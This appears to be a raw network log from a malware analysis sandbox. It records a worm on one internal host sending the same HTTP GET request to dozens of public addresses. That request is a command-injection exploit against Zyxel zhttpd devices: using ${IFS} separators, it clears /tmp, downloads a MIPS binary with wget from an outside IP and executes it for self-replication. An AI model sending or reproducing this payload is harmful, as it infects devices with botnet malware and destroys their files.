                              Mar 31, 2024 08:41:29.891024113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4954192.168.2.1358832149.222.247.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891060114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4955192.168.2.1352910163.156.37.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891102076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4956192.168.2.1356084195.237.182.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891166925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4957192.168.2.1342688204.20.79.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891171932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4958192.168.2.1356048142.221.108.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891202927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4959192.168.2.134605863.13.78.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891268015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4960192.168.2.1342490180.104.42.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891299009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4961192.168.2.133503687.219.115.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891323090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4962192.168.2.1337490203.97.175.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891370058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4963192.168.2.1347612141.8.128.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891448975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4964192.168.2.1341856149.176.193.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891469955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4965192.168.2.1350750159.182.94.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891504049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4966192.168.2.1352136218.186.53.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891546011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4967192.168.2.1345630103.185.205.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891598940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4968192.168.2.1348026141.252.48.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891648054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4969192.168.2.135876486.10.55.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891674995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4970192.168.2.135679213.16.211.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891727924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4971192.168.2.133371046.107.60.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891741991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4972192.168.2.1339910169.188.162.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891803980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4973192.168.2.1359228149.159.106.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891838074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4974192.168.2.1339310186.147.86.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891885996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4975192.168.2.1351376202.230.72.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891908884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4976192.168.2.134097463.34.81.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891951084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4977192.168.2.1357486172.61.169.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.891999960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4978192.168.2.1356462111.28.94.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892033100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4979192.168.2.1339048202.134.58.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892055988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4980192.168.2.1352420150.91.76.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892092943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4981192.168.2.1358994194.150.35.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892144918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4982192.168.2.134512447.130.25.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892170906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4983192.168.2.1353730160.227.220.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892231941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4984192.168.2.1347144123.108.200.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892265081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4985192.168.2.1354520121.157.199.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892301083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4986192.168.2.134316261.212.52.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892328024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4987192.168.2.134281689.237.174.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892365932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4988192.168.2.1342790133.76.181.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892414093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4989192.168.2.1341764212.221.110.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892438889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4990192.168.2.1359722192.64.233.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892472029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4991192.168.2.1340790180.244.95.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892512083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4992192.168.2.1357946129.152.191.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892575979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4993192.168.2.1353106141.169.106.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892587900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4994192.168.2.1343884212.66.19.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892625093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4995192.168.2.1354214131.122.219.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892673969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4996192.168.2.1340554207.139.252.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892721891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4997192.168.2.135949074.27.178.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892766953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4998192.168.2.1343130192.197.23.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892797947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4999192.168.2.1352204158.190.133.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892863035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5000192.168.2.1335198192.180.59.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892874956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5001192.168.2.134834836.206.194.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892927885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5002192.168.2.134039454.169.185.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892956018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5003192.168.2.134948269.96.48.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.892992973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5004192.168.2.1337080153.111.225.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893038988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5005192.168.2.135918438.216.75.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893079996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5006192.168.2.13536982.102.68.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893141985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5007192.168.2.1348520170.38.14.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893165112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5008192.168.2.1344736119.209.75.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893218040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5009192.168.2.1346442159.191.7.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893266916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5010192.168.2.133858263.108.18.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893290997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5011192.168.2.135230470.59.112.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893338919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5012192.168.2.135179073.207.45.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893367052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5013192.168.2.1352450162.16.201.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893444061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5014192.168.2.1348492206.47.20.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893445969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5015192.168.2.1354466108.190.158.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893487930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5016192.168.2.1356626184.102.248.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893537045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5017192.168.2.134698241.105.48.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893577099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5018192.168.2.135640480.224.133.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893627882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5019192.168.2.135418073.220.49.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893699884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5020192.168.2.1337912119.125.66.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893712997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5021192.168.2.1347136220.130.54.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893748045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5022192.168.2.1341908109.159.96.153443
                              TimestampBytes transferredDirectionData
